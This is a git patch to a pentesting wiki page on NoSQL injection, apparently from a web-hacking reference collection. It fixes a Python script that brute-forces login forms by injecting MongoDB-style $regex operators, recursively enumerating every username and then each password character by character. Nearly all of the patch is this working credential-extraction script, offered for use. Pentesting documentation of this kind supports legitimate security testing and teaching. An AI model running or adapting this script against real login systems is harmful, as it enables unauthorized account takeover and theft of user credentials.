From 4b445305dacf6b3d0281ecbdebcc4c87f6cbe97c Mon Sep 17 00:00:00 2001 From: Christopher Pritchard Date: Fri, 8 Dec 2023 20:56:03 +1300 Subject: [PATCH] Update nosql-injection.md with fixed brute force script Fixed login brute force script so it doesn't just find one username per starting letter - this royally boned me and I don't want anyone else to feel the pain. --- pentesting-web/nosql-injection.md | 25 +++++++------------------ 1 file changed, 7 insertions(+), 18 deletions(-) diff --git a/pentesting-web/nosql-injection.md b/pentesting-web/nosql-injection.md index 1c08a077d..b530470b1 100644 --- a/pentesting-web/nosql-injection.md +++ b/pentesting-web/nosql-injection.md @@ -237,31 +237,20 @@ def get_password(username): print("Found password "+password[1:].replace("\\", "")+" for username "+username) return password[1:].replace("\\", "") -def get_usernames(): +def get_usernames(prefix): usernames = [] - params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"} + params = {"username[$regex]":"", "password[$regex]":".*"} for c in possible_chars: - username = "^" + c + username = "^" + prefix + c params["username[$regex]"] = username + ".*" pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False) if int(pr.status_code) == 302: - print("Found username starting with "+c) - while True: - for c2 in possible_chars: - params["username[$regex]"] = username + c2 + ".*" - if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302: - username += c2 - print(username) - break - - if c2 == possible_chars[-1]: - print("Found username: "+username[1:]) - usernames.append(username[1:]) - break + print(username) + for user in get_usernames(prefix + c): + usernames.append(user) return usernames - -for u in get_usernames(): +for u in get_usernames(""): get_password(u) ```